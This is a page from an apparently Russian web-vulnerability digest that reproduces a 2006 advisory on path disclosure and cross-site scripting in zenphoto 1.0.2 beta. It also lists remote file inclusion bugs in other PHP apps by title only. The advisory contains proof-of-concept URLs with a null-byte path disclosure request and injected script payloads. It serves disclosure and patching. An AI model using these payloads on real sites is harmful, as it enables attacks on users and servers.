Дополнительная информация Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl) n@board <= 3.1.9e (naboard_pnr.php) Remote File Include Vulnerability Exploits Minichat v6 Remote File Include SH-News (RFI) Download-Engine Remote File Include From:raphael.huck_(at)_free.fr <raphael.huck_(at)_free.fr> Date:13 октября 2006 г.Subject:zenphoto Multiple Path Disclosure and Cross Site Scripting VulnerabilitiesVendor: zenphoto Vulnerable: zenphoto 1.0.2 beta and below The vendor has been warned and the vulnerabilities have been addressed in 1.0.3 beta. Path Disclosure --------------- http://www.example.com/photos/zen/i.php?a=EXISTING_ALBUM_NAME&i=EXISTING_IMAG E_NAME&s=thumb%00 which returns: Warning: imagecreatetruecolor() [function.imagecreatetruecolor]: Invalid image dimensions in /path/photos/zen/i.php on line 85... Cross Site Scripting -------------------- http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAME%00%3Csc ript%3Ealert('XSS%20Vulnerable')%3B%3C/script% 3E http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAMEℑ=EXISTING _IMAGE_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable') %3B%3C/script%3Eaaaa Solution -------- Update to 1.0.3 beta Original advisory ----------------- http://zone14.free.fr/advisories/4/ --Raphael HUCK
Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
n@board <= 3.1.9e (naboard_pnr.php) Remote File Include Vulnerability
Exploits Minichat v6 Remote File Include
SH-News (RFI)
Download-Engine Remote File Include
